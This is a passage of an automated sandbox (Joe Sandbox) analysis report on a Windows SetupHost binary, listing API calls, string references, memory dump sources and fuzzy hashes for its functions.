                                                                                                                                                                                                                • String ID: INDEX$WIM\IMAGE[*]$WIM\IMAGE[*]\CREATIONTIME\HIGHPART$WIM\IMAGE[*]\CREATIONTIME\LOWPART$WIM\IMAGE[*]\DIRCOUNT$WIM\IMAGE[*]\FILECOUNT$WIM\IMAGE[*]\HARDLINKBYTES$WIM\IMAGE[*]\LASTMODIFICATIONTIME\HIGHPART$WIM\IMAGE[*]\LASTMODIFICATIONTIME\LOWPART$WIM\IMAGE[*]\TOTALBYTES$WIM\IMAGE[*]\WIMBOOT$WIM\IMAGE[*]\WIMBOOTENTRIES
                                                                                                                                                                                                                • API String ID: 3859560861-2795955466
                                                                                                                                                                                                                • Opcode ID: 5fab259f86c5a3e82510682b8e15a2b48fd8678f29061ba25cb7c6de090c82e0
                                                                                                                                                                                                                • Instruction ID: d4d3db7bd8bd898f5134dd2be211b33a3e15e1a0d8438e7997ff163c4d1c29ee
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fab259f86c5a3e82510682b8e15a2b48fd8678f29061ba25cb7c6de090c82e0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5241EB72D8136877CB2176B54E06F8F39598BC5F68F0A41A4FE057A283D2BAD91083F5
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,00000000,?,009C02A6,00000000,009C0624,009C04E0,?), ref: 009BE2C2
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE660
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE676
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6C3
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6DB
                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,?,009C02A6,00000000,009C0624,009C04E0,?), ref: 009BE219
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009C02A6,00000000,009C0624,009C04E0,?), ref: 009BE223
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009C02A6,00000000,009C0624,009C04E0,?), ref: 009BE257
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009C02A6,00000000,009C0624,009C04E0,?), ref: 009BE25F
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,?,009C02A6,00000000,009C0624,009C04E0,?), ref: 009BE27D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,009C0624,009C04E0,?), ref: 009BE2A8
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BE2AF
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000000,009C0624,009C04E0,?), ref: 009BE2B6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • WdsRemoveDirectory: Unable to prepare path [%s]; GLE = 0x%x, xrefs: 009BE287
                                                                                                                                                                                                                • WdsRemoveDirectory: Unable to remove directory [%s]; GLE = 0x%x, xrefs: 009BE267
                                                                                                                                                                                                                • WdsRemoveDirectory: Unable to clear attributes on [%s]; GLE = 0x%x, xrefs: 009BE22D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap_wcsnicmp$AttributesFileFreeProcess
                                                                                                                                                                                                                • String ID: WdsRemoveDirectory: Unable to clear attributes on [%s]; GLE = 0x%x$WdsRemoveDirectory: Unable to prepare path [%s]; GLE = 0x%x$WdsRemoveDirectory: Unable to remove directory [%s]; GLE = 0x%x
                                                                                                                                                                                                                • API String ID: 686246089-2509674698
                                                                                                                                                                                                                • Opcode ID: dd67f71cadc7689eda2b28d0b98bc84d0dd0ee6723abfdbf98688e41364ae829
                                                                                                                                                                                                                • Instruction ID: 9ca3762b88c35413cb0b3845ebf150f7e04ad94ea3a737ac2849f4d14e62f342
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd67f71cadc7689eda2b28d0b98bc84d0dd0ee6723abfdbf98688e41364ae829
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A011B4327443107BEB20A7F95E4EFEF366CEBC5B75F094524F921D6251EAA08C0286A5
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(WIM_Verbose_Logging,00000000,00000010,?,?,?,?,?,?,009DE5B8), ref: 009DCC32
                                                                                                                                                                                                                • swscanf_s.MSVCRT ref: 009DCC51
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009DCCE4
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009DCCF2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,80070570,?,?,?,?,00000570,?,?,?,?,?,?,009DE5B8), ref: 009DCD21
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DCD28
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009DCD34
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009DCD42
                                                                                                                                                                                                                • SetLastError.KERNEL32(80070570,?,?,00000570,?,?,?,?,?,?,009DE5B8), ref: 009DCD5E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Status$Heap$EnvironmentFreeLastProcessVariableswscanf_s
                                                                                                                                                                                                                • String ID: WIM_Verbose_Logging$[%s:(%d) -> %s] %s
                                                                                                                                                                                                                • API String ID: 1696193701-1384624897
                                                                                                                                                                                                                • Opcode ID: c6e8ada34b9f86273e51cdac52b78e6894c4110aca7a056954db1e537148ecbb
                                                                                                                                                                                                                • Instruction ID: d74efdcdadbc53e71d081a81aa2a5b4dc4dbee379ac0ebb3b74bef09690c399f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6e8ada34b9f86273e51cdac52b78e6894c4110aca7a056954db1e537148ecbb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1641A5B2A541099BCB10DFA8DD44AEE7BBAFB48710F14C526F549E3390CB349D41CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009B8596
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00001000,0000000C,009B8448,00000000,?,00000004,009AB389,DUCHANNELS_FLAG,?,00000000), ref: 009B85EA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009B85F1
                                                                                                                                                                                                                • memset.MSVCRT ref: 009B8618
                                                                                                                                                                                                                • CompareStringW.KERNEL32(00000409,00000001,00000000,000000FF,009844AC,000000FF,00000000,00000000,00001000), ref: 009B864E
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 009B865B
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009B86B4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009B86C1
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009B86C8
                                                                                                                                                                                                                  • Part of subcall function 009B9D9C: EtwEventEnabled.NTDLL(?,?,009BBC0D), ref: 009B9E13
                                                                                                                                                                                                                  • Part of subcall function 009B9D9C: EtwEventWrite.NTDLL(?,?,009BBC0D,{6c104913-738b-4411-a4ec-8b594e314f6b},00000000), ref: 009B9E3B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingAsString, xrefs: 009B85C4
                                                                                                                                                                                                                • OneSettings: Found [%s] -> [%s], xrefs: 009B8688
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$String$AllocEventFreeProcess$CompareEnabledH_prolog3Writememset
                                                                                                                                                                                                                • String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingAsString$OneSettings: Found [%s] -> [%s]
                                                                                                                                                                                                                • API String ID: 3077710181-1814587586
                                                                                                                                                                                                                • Opcode ID: b743b7eef20217f7e6f8d4dacf78ebbe5df42ed3cd666d0a5e35a2da11db1b38
                                                                                                                                                                                                                • Instruction ID: cc5d527fdba281d35ac9179f978fd7676421e919fbf8ed18d2545198940c8af6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b743b7eef20217f7e6f8d4dacf78ebbe5df42ed3cd666d0a5e35a2da11db1b38
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0731A070744305ABCB10AFA48D85FEF7679AB88720F248569F615AB2C1CEB58D01CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000010,00000000,009E0E90,009E0468,00000000,00A16DD0,?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24), ref: 009E24DA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24,?,?,00000000,?,009E0B15,?), ref: 009E24E1
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00A16788,?,00000000,00A16E00,?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24,?,?,00000000), ref: 009E2518
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00A16788,?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24,?,?,00000000,?,009E0B15,?), ref: 009E252D
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E255A
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E2568
                                                                                                                                                                                                                • SetLastError.KERNEL32(8007000E,00000071,8007000E,?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24,?,?,00000000,?,009E0B15), ref: 009E2584
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24,?,?,00000000,?,009E0B15,?), ref: 009E2591
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009E0E70), ref: 009E2598
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • onecore\base\ntsetup\opktools\osimage\lib\utility\utility.c, xrefs: 009E253E
                                                                                                                                                                                                                • WimAtExitReserve, xrefs: 009E2543
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Error$CriticalProcessSectionStatus$AllocEnterFreeLastLeave
                                                                                                                                                                                                                • String ID: WimAtExitReserve$onecore\base\ntsetup\opktools\osimage\lib\utility\utility.c
                                                                                                                                                                                                                • API String ID: 3155143027-1957737528
                                                                                                                                                                                                                • Opcode ID: 31135691f5d6a282cd4d222d339c221884f746e02d9075b5e41e95475b5f8672
                                                                                                                                                                                                                • Instruction ID: 2e6bb4893007cb571e7fa87716a22340d15a9aa089943b1cab97a53601f8d37c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31135691f5d6a282cd4d222d339c221884f746e02d9075b5e41e95475b5f8672
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57112C3674436177C72287B6ED1DBDF2EAEAB84761F159110F509D7290DEB48C4286D0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,009DDD93,?,00000000,00000000,00000000,?,009DE028), ref: 009E470C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009E4713
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00100000,00000000,?,00000000,?,?,?,?,009DDD93,?,00000000,00000000,00000000,?,009DE028), ref: 009E4731
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,009DDD93,?,00000000,00000000,00000000,?,009DE028,?,00000000), ref: 009E4738
                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009E4782
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-0000000C,-009FFFFF,00000000,00A00000,00000000,?,?,?,?,009DDD93,?,00000000,00000000,00000000), ref: 009E479F
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,009DDD93,?,00000000,00000000,00000000,?,009DE028,?,00000000), ref: 009E47A6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,009DDD93,?,00000000,00000000,00000000,?,009DE028,?,00000000), ref: 009E485E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E4865
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,009DDD93,?,00000000,00000000,00000000,?,009DE028,?,00000000), ref: 009E4870
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E4877
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$Alloc$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4072252039-0
                                                                                                                                                                                                                • Opcode ID: e01423fd43039d59f5b13bd880c998611427f6d909735998082efeabb5536428
                                                                                                                                                                                                                • Instruction ID: 340a6782c852e40df20a1ebc6883c36039b2ec2354c18b6cd88df030d926ac22
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e01423fd43039d59f5b13bd880c998611427f6d909735998082efeabb5536428
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1451A671E00385ABCB16DFE68D85BBE7BBDEF88744F148469E902A7291DB349C018B51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000001,?,00000000), ref: 009FD073
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,?,00000000), ref: 009FD098
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009FD09F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000200,00000000,00000001,?,00000000), ref: 009FD0AA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009FD0B1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009FD104
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000200,00000200), ref: 009FD190
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009FD197
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 009FD1D4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009FD1DB
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000001), ref: 009FD1E7
                                                                                                                                                                                                                  • Part of subcall function 009FD470: GetProcessHeap.KERNEL32(00000000,00000208,00000001,?,00000000,00000000,?,009FD06C,00000000,00000001,?,00000000), ref: 009FD489
                                                                                                                                                                                                                  • Part of subcall function 009FD470: HeapAlloc.KERNEL32(00000000,?,009FD06C,00000000,00000001,?,00000000), ref: 009FD490
                                                                                                                                                                                                                  • Part of subcall function 009FD470: GetVolumePathNameW.KERNEL32(00000000,00000000,00000104), ref: 009FD4A9
                                                                                                                                                                                                                  • Part of subcall function 009FD470: GetProcessHeap.KERNEL32(00000000,00000208,?,009FD06C,00000000,00000001,?,00000000), ref: 009FD4B9
                                                                                                                                                                                                                  • Part of subcall function 009FD470: HeapAlloc.KERNEL32(00000000,?,009FD06C,00000000,00000001,?,00000000), ref: 009FD4C0
                                                                                                                                                                                                                  • Part of subcall function 009FD470: GetVolumeNameForVolumeMountPointW.KERNEL32(00000000,00000000,00000104), ref: 009FD4D3
                                                                                                                                                                                                                  • Part of subcall function 009FD470: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009FD513
                                                                                                                                                                                                                  • Part of subcall function 009FD470: GetProcessHeap.KERNEL32(00000000,00000000,?,009FD06C,00000000,00000001,?,00000000), ref: 009FD51F
                                                                                                                                                                                                                  • Part of subcall function 009FD470: HeapFree.KERNEL32(00000000,?,009FD06C), ref: 009FD526
                                                                                                                                                                                                                  • Part of subcall function 009FD470: GetProcessHeap.KERNEL32(00000000,00000000,?,009FD06C,00000000,00000001,?,00000000), ref: 009FD532
                                                                                                                                                                                                                  • Part of subcall function 009FD470: HeapFree.KERNEL32(00000000,?,009FD06C), ref: 009FD539
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$AllocVolume$CloseHandleName$CreateErrorFileLastMountPathPoint
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 1244954680-4108050209
                                                                                                                                                                                                                • Opcode ID: efd9014705631492b7e8a863f20add5b2ea1b888a9e2ab3efe315c84807d9544
                                                                                                                                                                                                                • Instruction ID: 0620d96866ecb1fd3d3f2509de054c30fc0f06daf815f703e439b293e43a2db7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: efd9014705631492b7e8a863f20add5b2ea1b888a9e2ab3efe315c84807d9544
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5751B071F0521D9BDB14DFE4C8887EEBBBABF48350F144629E911EB290D7709C018B90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009AD436
                                                                                                                                                                                                                • GetVolumeNameForVolumeMountPointW.KERNEL32(003A003F,?,00000032), ref: 009AD448
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009AD452
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SYSTEM\Setup\MoSetup\Volatile, xrefs: 009AD505
                                                                                                                                                                                                                • ?, xrefs: 009AD3D7
                                                                                                                                                                                                                • StorageDriveLetter, xrefs: 009AD50B
                                                                                                                                                                                                                • CSetupHost::ReportStorageLocation, xrefs: 009AD405, 009AD46D
                                                                                                                                                                                                                • \, xrefs: 009AD3E0
                                                                                                                                                                                                                • SetupHost: Putting external storage location for download in Reg [%c], xrefs: 009AD541
                                                                                                                                                                                                                • SetupHost: Reporting external storage location for download to WU [%s], xrefs: 009AD49B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Volume$ErrorLastMountNamePointmemset
                                                                                                                                                                                                                • String ID: ?$CSetupHost::ReportStorageLocation$SYSTEM\Setup\MoSetup\Volatile$SetupHost: Putting external storage location for download in Reg [%c]$SetupHost: Reporting external storage location for download to WU [%s]$StorageDriveLetter$\
                                                                                                                                                                                                                • API String ID: 3209952719-2916804376
                                                                                                                                                                                                                • Opcode ID: 21653d1e2edad922965d7942875cd888bf9471c5ccf0f651600aef5045070804
                                                                                                                                                                                                                • Instruction ID: d7559f009fb283fbf81b8c82f75c4e19de667983b0206a3d1affbade50ef7394
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21653d1e2edad922965d7942875cd888bf9471c5ccf0f651600aef5045070804
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54419774B002149BDB04EBA4CC89ABDB7A9FF89714B18845AF906D7391DF74AD02CBD1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009E065B: SetLastError.KERNEL32(00000057,?,00000000,00000000,00000000,?,009E5590), ref: 009E0670
                                                                                                                                                                                                                • wcsrchr.MSVCRT ref: 009E0887
                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,009EAF32), ref: 009E08B3
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009EAF32), ref: 009E08C1
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009EAF32), ref: 009E08D7
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,?,?,?,009EAF32), ref: 009E08F1
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009EAF32), ref: 009E0907
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009EAF32), ref: 009E0992
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009EAF32), ref: 009E0999
                                                                                                                                                                                                                • wcsrchr.MSVCRT ref: 009E09AC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heapwcsrchr$FreeInformationProcessVolume
                                                                                                                                                                                                                • String ID: GetVolumeRootFromPath
                                                                                                                                                                                                                • API String ID: 1993139380-4256452346
                                                                                                                                                                                                                • Opcode ID: d8565154f76772c141cddd65844b864b9a285b14184b4b1e4dbd581ae4498478
                                                                                                                                                                                                                • Instruction ID: b20a8490a40222315d185a332176475f252e66208a98773cb5862e22de7df0bf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8565154f76772c141cddd65844b864b9a285b14184b4b1e4dbd581ae4498478
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09310A37B043A1A7E7239EFB8C4576F66B8AFC1750F114129ED45EB253DAB4CC8046A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009B86F2
                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 009B8761
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009B876B
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 009B8788
                                                                                                                                                                                                                • TerminateProcess.KERNEL32(?,0000042B), ref: 009B87A2
                                                                                                                                                                                                                • TerminateProcess.KERNEL32(?,000005B4), ref: 009B87BB
                                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 009B87D4
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009B87F7
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009B8802
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
